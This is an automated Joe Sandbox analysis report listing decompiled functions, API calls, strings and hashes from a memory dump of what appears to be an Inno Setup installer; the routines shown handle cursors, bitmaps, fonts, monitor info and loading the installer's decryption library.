Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Message$TextWindow$CurrentDispatchSendThreadTranslate
String ID: [Paused]
API String ID: 3744435275-4230553315
Opcode ID: 2bd8903bc6048fca44dcd094e85cb484f427e1ecb3f8174d551b9457d5fbcc55
Instruction ID: 981fcd63c65a49ed4d58aa2f174a6deeed895017bf3f82c239f54855c2373808
Opcode Fuzzy Hash: 2bd8903bc6048fca44dcd094e85cb484f427e1ecb3f8174d551b9457d5fbcc55
Instruction Fuzzy Hash: F1310431904648AECB11EFB9DC41B9E7BF8EB49714F50847BE900E72D2D7389909CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00464444 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99
sleepCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00464444(void* __ebx, void* __ecx, void* __edi, struct HICON__* __esi, void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t40;
				intOrPtr _t41;
				intOrPtr _t44;
				struct HICON__* _t56;
				intOrPtr _t68;
				void* _t73;
				intOrPtr _t81;
				void* _t91;
				void* _t101;

				_t101 = __fp0;
				_t88 = __esi;
				_t87 = __edi;
				_push(__esi);
				_push(__edi);
				_v8 = 0;
				_push(_t91);
				_push(0x464583);
				_push( *[fs:eax]);
				 *[fs:eax] = _t91 + 0xfffffff4;
				_t73 = 0;
				E00414D00( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x218)),  &_v8, __eflags);
				if(( *0x4ae17d & 0x00000020) != 0) {
					_t73 = E0046EC68(_v8);
				}
				if(_t73 == 0) {
					_t96 =  *0x4ae298;
					if( *0x4ae298 != 0) {
						_v16 = _v8;
						_v12 = 0xb;
						_t68 =  *0x4ae298; // 0x21fdcf0
						_t73 = E004875E8(_t68,  &_v16, "CheckPassword", _t96, _t101, _t73, 0, 0);
					}
				}
				if(_t73 == 0) {
					_t40 =  *((intOrPtr*)(_a4 - 4));
					__eflags =  *((char*)(_t40 + 0x37));
					if( *((char*)(_t40 + 0x37)) != 0) {
						_t56 = GetCursor();
						_t88 = _t56;
						SetCursor(LoadCursorA(0, 0x7f02));
						Sleep(0x2ee);
						SetCursor(_t56);
					}
					_t41 =  *0x48dcc4; // 0x21ea33c
					E00473BCC(_t41, _t73, 2, 0, _t87, _t88, 1, 1, 0);
					_t44 =  *((intOrPtr*)(_a4 - 4));
					__eflags =  *((char*)(_t44 + 0x37));
					if( *((char*)(_t44 + 0x37)) != 0) {
						__eflags = 0;
						E00414D30( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x218)), _t73, 0, _t87, _t88);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x218)))) + 0x78))();
					}
				} else {
					 *0x4ae254 = 0;
					if(( *0x4ae181 & 0x00000002) != 0) {
						E00403598(E0046608C() + 0x138, _t73, _v8, _t87, _t88);
					}
					E00414D30( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x218)), _t73, 0, _t87, _t88);
				}
				_pop(_t81);
				 *[fs:eax] = _t81;
				_push(0x46458a);
				return E00403548( &_v8);
			}

0x00464444
0x00464444
0x00464444
0x0046444b
0x0046444c
0x0046444f
0x00464454
0x00464455
0x0046445a
0x0046445d
0x00464460
0x00464471
0x0046447d
0x00464487
0x00464487
0x0046448b
0x0046448d
0x00464494
0x0046449e
0x004644a1
0x004644ad
0x004644b7
0x004644b7
0x00464494
0x004644bb
0x004644f7
0x004644fa
0x004644fe
0x00464500
0x00464505
0x00464514
0x0046451e
0x00464524
0x00464524
0x00464533
0x00464538
0x00464540
0x00464543
0x00464547
0x00464555
0x00464557
0x0046456a
0x0046456a
0x004644bd
0x004644bd
0x004644cb
0x004644da
0x004644da
0x004644ed
0x004644ed
0x0046456f
0x00464572
0x00464575
0x00464582

APIs

GetCursor.USER32(00000000,00464583), ref: 00464500
LoadCursorA.USER32 ref: 0046450E
SetCursor.USER32(00000000,00000000,00007F02,00000000,00464583), ref: 00464514
Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,00464583), ref: 0046451E
SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,00464583), ref: 00464524

Strings

CheckPassword, xrefs: 004644A8

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Cursor$LoadSleep
String ID: CheckPassword
API String ID: 4023313301-1302249611
Opcode ID: 3806174211145a2449c7ea79849d8b2a80b913637dca4c07358e7a15a479126e
Instruction ID: 97a7be1ee274cf472f17a9b3f77539a65fc718be893302e489d415f7d31673a6
Opcode Fuzzy Hash: 3806174211145a2449c7ea79849d8b2a80b913637dca4c07358e7a15a479126e
Instruction Fuzzy Hash: 62319330600244AFDB01EB69D88AF9D7BE4AF45314F5584B6B9049B3E2DB78AE40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C360 Relevance: 10.6, APIs: 7, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E0041C360(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				struct HDC__* _t23;
				intOrPtr _t31;
				struct HDC__* _t34;
				struct tagBITMAPINFO* _t37;
				intOrPtr _t44;
				void* _t46;
				struct HBITMAP__* _t48;
				void* _t51;

				_t37 = __ecx;
				_t46 = __edx;
				_t48 = __eax;
				E0041C260(__eax, _a4, __ecx);
				_v12 = 0;
				_v16 = GetFocus();
				_t23 = _v16;
				_push(_t23);
				L00406034();
				_v20 = _t23;
				_push(_t51);
				_push(0x41c40b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				if(_t46 != 0) {
					_push(0);
					_push(_t46);
					_t34 = _v20;
					_push(_t34);
					L00405E34();
					_v12 = _t34;
					_push(_v20);
					L00405DF4();
				}
				_v5 = GetDIBits(_v20, _t48, 0, _t37->bmiHeader.biHeight, _a8, _t37, 0) != 0;
				_pop(_t44);
				 *[fs:eax] = _t44;
				_push(0x41c412);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v20);
					L00405E34();
				}
				_push(_v20);
				_t31 = _v16;
				_push(_t31);
				L0040621C();
				return _t31;
			}

0x0041c369
0x0041c36b
0x0041c36d
0x0041c376
0x0041c37d
0x0041c385
0x0041c388
0x0041c38b
0x0041c38c
0x0041c391
0x0041c396
0x0041c397
0x0041c39c
0x0041c39f
0x0041c3a4
0x0041c3a6
0x0041c3a8
0x0041c3a9
0x0041c3ac
0x0041c3ad
0x0041c3b2
0x0041c3b8
0x0041c3b9
0x0041c3b9
0x0041c3d7
0x0041c3dd
0x0041c3e0
0x0041c3e3
0x0041c3ec
0x0041c3ee
0x0041c3f3
0x0041c3f7
0x0041c3f8
0x0041c3f8
0x0041c400
0x0041c401
0x0041c404
0x0041c405
0x0041c40a

APIs

Part of subcall function 0041C260: GetObjectA.GDI32(?,00000018), ref: 0041C26D

GetFocus.USER32 ref: 0041C380
740BAC50.USER32(?), ref: 0041C38C
740BB410.GDI32(?,?,00000000,00000000,0041C40B,?,?), ref: 0041C3AD
740BB150.GDI32(?,?,?,00000000,00000000,0041C40B,?,?), ref: 0041C3B9
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C3D0
740BB410.GDI32(?,00000000,00000000,0041C412,?,?), ref: 0041C3F8
740BB380.USER32(?,?,0041C412,?,?), ref: 0041C405

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B410$B150B380BitsFocusObject
String ID:
API String ID: 514114485-0
Opcode ID: a2f2748db9921a695bd80887cc945c46912036efc7ae4edac7df8ba90896de32
Instruction ID: 29b4103d32fe40798502092475d49038862fa98bf49bc602b2c41bf2daac9018
Opcode Fuzzy Hash: a2f2748db9921a695bd80887cc945c46912036efc7ae4edac7df8ba90896de32
Instruction Fuzzy Hash: FC116D71A44218AFDB10DBE9CC85FAFB7FCEF48700F55846AB514E7281D63899008B68

Uniqueness

Uniqueness Score: -1.00%

Function 00418E6C Relevance: 10.6, APIs: 7, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00418E6C(void* __eax) {
				int _v8;
				intOrPtr _v12;
				char _v16;
				int _t15;
				intOrPtr _t17;
				intOrPtr _t21;
				int _t31;
				void* _t33;
				intOrPtr _t41;
				void* _t43;
				void* _t45;
				intOrPtr _t46;

				_t43 = _t45;
				_t46 = _t45 + 0xfffffff4;
				_t33 = __eax;
				if( *((short*)(__eax + 0x46)) == 0xffff) {
					return __eax;
				} else {
					_push(1);
					_push(1);
					_push(1);
					_push(GetSystemMetrics(0xe));
					_t15 = GetSystemMetrics(0xd);
					_push(_t15);
					L00409BBC();
					_v8 = _t15;
					_push(_t43);
					_push(0x418f20);
					_push( *[fs:eax]);
					 *[fs:eax] = _t46;
					_t17 =  *0x48d62c; // 0x21d0660
					E00409BDC(_v8, E00423584(_t17,  *((short*)(_t33 + 0x46))));
					_t21 =  *0x48d62c; // 0x21d0660
					E00409BDC(_v8, E00423584(_t21,  *((short*)(_t33 + 0x46))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L00409C10();
					_push( &_v16);
					_push(0);
					L00409C20();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L00409C10();
					_pop(_t41);
					 *[fs:eax] = _t41;
					_push(0x418f27);
					_t31 = _v8;
					_push(_t31);
					L00409BC4();
					return _t31;
				}
			}

0x00418e6d
0x00418e6f
0x00418e73
0x00418e7a
0x00418f2b
0x00418e80
0x00418e80
0x00418e82
0x00418e84
0x00418e8d
0x00418e90
0x00418e95
0x00418e96
0x00418e9b
0x00418ea0
0x00418ea1
0x00418ea6
0x00418ea9
0x00418eb0
0x00418ebf
0x00418ec8
0x00418ed7
0x00418edc
0x00418ede
0x00418ee0
0x00418ee5
0x00418ee6
0x00418eee
0x00418eef
0x00418ef1
0x00418ef9
0x00418efd
0x00418efe
0x00418f03
0x00418f04
0x00418f0b
0x00418f0e
0x00418f11
0x00418f16
0x00418f19
0x00418f1a
0x00418f1f
0x00418f1f

APIs

GetSystemMetrics.USER32 ref: 00418E88
GetSystemMetrics.USER32 ref: 00418E90
6FEB7CB0.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,?), ref: 00418E96

Part of subcall function 00409BDC: 6FEB0620.COMCTL32(?,000000FF,00000000,00418EC4,00000000,00418F20,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,?), ref: 00409BE0

6FF0BC60.COMCTL32(?,00000000,00000000,00000000,00000000,00418F20,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,?), ref: 00418EE6
6FF0B6C0.COMCTL32(00000000,?,?,00000000,00000000,00000000,00000000,00418F20,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418EF1
6FF0BC60.COMCTL32(?,00000001,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00418F20,?,00000000,0000000D,00000000), ref: 00418F04
6FEB7D50.COMCTL32(?,00418F27,?,00000000,?,?,00000000,00000000,00000000,00000000,00418F20,?,00000000,0000000D,00000000,0000000E), ref: 00418F1A

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: MetricsSystem$B0620
String ID:
API String ID: 2249525592-0
Opcode ID: af484ada863fa832f17f119ad9ebaf1f987fe9d44dec7766868518ad51dd80a6
Instruction ID: 68909b105c04f4f6bd3f610192843d7fce56e7f6c389e93d535f3de4bf1457d8
Opcode Fuzzy Hash: af484ada863fa832f17f119ad9ebaf1f987fe9d44dec7766868518ad51dd80a6
Instruction Fuzzy Hash: 61116371B44204BAEB10EBA5DC83F5E73B9EB48714F50446AB604F72C2EAB9AD40C718

Uniqueness

Uniqueness Score: -1.00%

Function 0041B67A Relevance: 10.6, APIs: 7, Instructions: 57
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041B67A() {
				void* _t40;
				void* _t43;
				void* _t44;

				if( *(_t44 - 0x10) != 0) {
					_t40 = SelectObject( *(_t44 - 0x18),  *(_t44 - 4));
					_t43 = SelectObject( *(_t44 - 0x1c),  *(_t44 - 0x10));
					StretchBlt( *(_t44 - 0x1c), 0, 0,  *(_t44 - 0xc),  *(_t44 - 8),  *(_t44 - 0x18), 0, 0,  *(_t44 - 0x30),  *(_t44 - 0x2c), 0xcc0020);
					if(_t40 != 0) {
						SelectObject( *(_t44 - 0x18), _t40);
					}
					if(_t43 != 0) {
						SelectObject( *(_t44 - 0x1c), _t43);
					}
				}
				DeleteDC( *(_t44 - 0x18));
				DeleteDC( *(_t44 - 0x1c));
				return  *(_t44 - 0x10);
			}

0x0041b67e
0x0041b68d
0x0041b69c
0x0041b6c3
0x0041b6ca
0x0041b6d1
0x0041b6d1
0x0041b6d8
0x0041b6df
0x0041b6df
0x0041b6d8
0x0041b6e8
0x0041b6f1
0x0041b6ff

APIs

SelectObject.GDI32(00000000,?), ref: 0041B688
SelectObject.GDI32(?,00000000), ref: 0041B697
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B6C3
SelectObject.GDI32(00000000,00000000), ref: 0041B6D1
SelectObject.GDI32(?,00000000), ref: 0041B6DF
DeleteDC.GDI32(00000000), ref: 0041B6E8
DeleteDC.GDI32(?), ref: 0041B6F1

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ObjectSelect$Delete$Stretch
String ID:
API String ID: 1458357782-0
Opcode ID: 662eb367a24eb1d9855068de308936f776896b5eda4f862f2396db1431566e63
Instruction ID: e2b81d3ff571744cae9fa4caf7e23546683252680a7c0dd50c3c2924331913d3
Opcode Fuzzy Hash: 662eb367a24eb1d9855068de308936f776896b5eda4f862f2396db1431566e63
Instruction Fuzzy Hash: D6117872E00619BBDB50EAE9D885FAFB3BCEB08304F104416B614E7281C6789D418BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00487CF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00487CF0(struct HDC__* __eax, void* __ebx, long* __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HDC__* _v8;
				struct tagSIZE _v16;
				struct tagTEXTMETRICA _v72;
				signed int _t25;
				signed int _t26;
				struct HDC__* _t32;
				intOrPtr _t41;
				long* _t43;
				signed int* _t45;
				void* _t48;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t43 = __ecx;
				_t45 = __edx;
				_push(0);
				L00406034();
				_v8 = __eax;
				_push(_t48);
				_push(0x487d7c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48 + 0xffffffbc;
				SelectObject(_v8, E0041A400(__eax, __eax, __ecx, __ecx, __edx));
				GetTextExtentPointA(_v8, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", 0x34,  &_v16);
				asm("cdq");
				_t25 = _v16.cx / 0x1a + 1;
				_t26 = _t25 >> 1;
				if(_t25 < 0) {
					asm("adc eax, 0x0");
				}
				 *_t45 = _t26;
				GetTextMetricsA(_v8,  &_v72);
				 *_t43 = _v72.tmHeight;
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E00487D83);
				_t32 = _v8;
				_push(_t32);
				_push(0);
				L0040621C();
				return _t32;
			}

0x00487cf6
0x00487cf7
0x00487cf8
0x00487cf9
0x00487cfb
0x00487cff
0x00487d01
0x00487d06
0x00487d0b
0x00487d0c
0x00487d11
0x00487d14
0x00487d23
0x00487d37
0x00487d44
0x00487d47
0x00487d48
0x00487d4a
0x00487d4c
0x00487d4c
0x00487d4f
0x00487d59
0x00487d61
0x00487d65
0x00487d68
0x00487d6b
0x00487d70
0x00487d73
0x00487d74
0x00487d76
0x00487d7b

APIs

740BAC50.USER32(00000000,?,?,00000000), ref: 00487D01

Part of subcall function 0041A400: CreateFontIndirectA.GDI32(?), ref: 0041A4BF

SelectObject.GDI32(00000000,00000000), ref: 00487D23
GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00488151), ref: 00487D37
GetTextMetricsA.GDI32(00000000,?), ref: 00487D59
740BB380.USER32(00000000,00000000,00487D83,00487D7C,?,00000000,?,?,00000000), ref: 00487D76

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00487D2E

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Text$B380CreateExtentFontIndirectMetricsObjectPointSelect
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 3658053993-222967699
Opcode ID: 93811b49c086e4ee00ebdd99acb17bb4bfc7b78e7af86220b6fcd357411d1bd1
Instruction ID: d9019e0bb3a9562444bf433db70554f715e948d91cccb9313893eeb3044e37be
Opcode Fuzzy Hash: 93811b49c086e4ee00ebdd99acb17bb4bfc7b78e7af86220b6fcd357411d1bd1
Instruction Fuzzy Hash: 38016576A44604AFD700EBA5CD51F6FB7FCDF48704F614476B604E7281D678AE009B58

Uniqueness

Uniqueness Score: -1.00%

Function 004235AC Relevance: 10.6, APIs: 7, Instructions: 56
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004235AC(long __eax, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				struct HWND__* _t26;
				short _t27;
				void* _t29;
				struct tagPOINT* _t30;

				_t7 = __eax;
				_t30 = _t29 + 0xfffffff8;
				_t27 = __edx;
				_t19 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x28))) {
					 *((short*)(__eax + 0x28)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E00423584(_t19, _t27));
					} else {
						GetCursorPos(_t30);
						_push(_v24.y);
						_t26 = WindowFromPoint(_v24);
						if(_t26 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t26, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t26, 0x20, _t26, E00406364(SendMessageA(_t26, 0x84, _v24, _v24.y), 0x200));
							}
						}
					}
				}
				return _t7;
			}

0x004235ac
0x004235b0
0x004235b3
0x004235b5
0x004235bb
0x004235bd
0x004235c4
0x00423620
0x0042362b
0x004235c6
0x004235c7
0x004235cc
0x004235d9
0x004235dd
0x00000000
0x004235df
0x004235e2
0x004235f0
0x00000000
0x004235f2
0x00423619
0x00423619
0x004235f0
0x004235dd
0x004235c4
0x00423636

APIs

GetCursorPos.USER32 ref: 004235C7
WindowFromPoint.USER32(?,?), ref: 004235D4
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004235E2
GetCurrentThreadId.KERNEL32 ref: 004235E9
SendMessageA.USER32 ref: 00423602
SendMessageA.USER32 ref: 00423619
SetCursor.USER32(00000000), ref: 0042362B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: b502ec6814b604d24bae2a1f8125e1db2d26b1b7337267be659f96dd2f702ece
Instruction ID: 5367668f19faa394c192bfe58e9fa93efb6ea5591cd296e246658e60e733029d
Opcode Fuzzy Hash: b502ec6814b604d24bae2a1f8125e1db2d26b1b7337267be659f96dd2f702ece
Instruction Fuzzy Hash: 2201D42230431036D6207F795C82E2F72ACDB84B25F51413FB909AB2C2D93D8D1153AD

Uniqueness

Uniqueness Score: -1.00%

Function 00487B14 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00487B14(void* __eax, void* __edx) {
				void _v68;
				struct HINSTANCE__* _t4;
				void* _t7;
				struct HINSTANCE__* _t10;
				struct HINSTANCE__* _t11;
				void* _t15;
				struct HINSTANCE__* _t19;
				void* _t22;
				intOrPtr* _t23;

				_t15 = __edx;
				_t22 = __eax;
				_t4 = GetModuleHandleA("user32.dll");
				_t10 = _t4;
				_push("MonitorFromRect");
				_push(_t10);
				L00405AA4();
				_t19 = _t4;
				_push("GetMonitorInfoA");
				_push(_t10);
				L00405AA4();
				_t11 = _t4;
				if(_t19 == 0 || _t11 == 0) {
					L4:
					return E00487ADC(_t15);
				} else {
					_t7 = _t19->i(_t22, 2);
					 *_t23 = 0x28;
					_push(_t23);
					_push(_t7);
					if(_t11->i() == 0) {
						goto L4;
					}
					_push(_t15);
					return memcpy(_t15,  &_v68, 4 << 2);
				}
			}

0x00487b1b
0x00487b1d
0x00487b24
0x00487b29
0x00487b2b
0x00487b30
0x00487b31
0x00487b36
0x00487b38
0x00487b3d
0x00487b3e
0x00487b43
0x00487b47
0x00487b72
0x00000000
0x00487b4d
0x00487b50
0x00487b54
0x00487b5b
0x00487b5c
0x00487b61
0x00000000
0x00000000
0x00487b63
0x00000000
0x00487b6f

APIs

GetModuleHandleA.KERNEL32(user32.dll), ref: 00487B24
6D2B5550.KERNEL32(00000000,MonitorFromRect,user32.dll), ref: 00487B31
6D2B5550.KERNEL32(00000000,GetMonitorInfoA,00000000,MonitorFromRect,user32.dll), ref: 00487B3E

Strings

user32.dll, xrefs: 00487B1F
GetMonitorInfoA, xrefs: 00487B38
MonitorFromRect, xrefs: 00487B2B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550$HandleModule
String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
API String ID: 880429387-2254406584
Opcode ID: 77250b99fb371581aac03a1f949d14eb25d0cdf680bcb0579a9a3a79cf553930
Instruction ID: 2618e4b158f306588fddb4a0b3a1efde636936219e59a5d9e19b2a21ded6cee6
Opcode Fuzzy Hash: 77250b99fb371581aac03a1f949d14eb25d0cdf680bcb0579a9a3a79cf553930
Instruction Fuzzy Hash: FDF02B527057152BD61076B60CA1F7F21CDCB857A4F640937BD00E7382EAACEC4047AD

Uniqueness

Uniqueness Score: -1.00%

Function 00459948 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00459948(intOrPtr __eax) {
				intOrPtr _t14;

				_push("ISCryptGetVersion");
				_push(__eax);
				L00405AA4();
				 *0x4adf3c = __eax;
				_push("ArcFourInit");
				_push(__eax);
				L00405AA4();
				 *0x4adf40 = __eax;
				_push("ArcFourCrypt");
				_push(__eax);
				L00405AA4();
				 *0x4adf44 = __eax;
				if( *0x4adf3c == 0 ||  *0x4adf40 == 0) {
					L4:
					 *0x4adf3c = 0;
					 *0x4adf40 = 0;
					 *0x4adf44 = 0;
					return 0;
				} else {
					_t14 =  *0x4adf44;
					if(_t14 == 0) {
						goto L4;
					} else {
						return  *0x4adf3c() - 0x00000001 & 0xffffff00 | _t14 == 0x00000000;
					}
				}
			}

0x0045994b
0x00459950
0x00459951
0x00459956
0x0045995b
0x00459960
0x00459961
0x00459966
0x0045996b
0x00459970
0x00459971
0x00459976
0x00459982
0x004599a2
0x004599a6
0x004599ae
0x004599b6
0x004599bd
0x0045998d
0x0045998d
0x00459994
0x00000000
0x00459996
0x004599a1
0x004599a1
0x00459994

APIs

6D2B5550.KERNEL32(10000000,ISCryptGetVersion,?,004743A9,00000000,004743D2), ref: 00459951
6D2B5550.KERNEL32(10000000,ArcFourInit,10000000,ISCryptGetVersion,?,004743A9,00000000,004743D2), ref: 00459961
6D2B5550.KERNEL32(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,004743A9,00000000,004743D2), ref: 00459971

Strings

ArcFourCrypt, xrefs: 0045996B
ISCryptGetVersion, xrefs: 0045994B
ArcFourInit, xrefs: 0045995B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550
String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
API String ID: 2242650566-508647305
Opcode ID: 6771e9a318771f0fdf81752e539c59a755b3b623caa0e990500ed0ddbbb6b6cb
Instruction ID: 8e1f5012a0d9a6bbf6dd0a3af8a39c3c1ecd97edeb0181f34df01814c1e8ce81
Opcode Fuzzy Hash: 6771e9a318771f0fdf81752e539c59a755b3b623caa0e990500ed0ddbbb6b6cb
Instruction Fuzzy Hash: 01F0F4F0A116009FDB24DF26AD857677B95EBC9306B08807BB80795AA2DBBC0844DE0C

Uniqueness

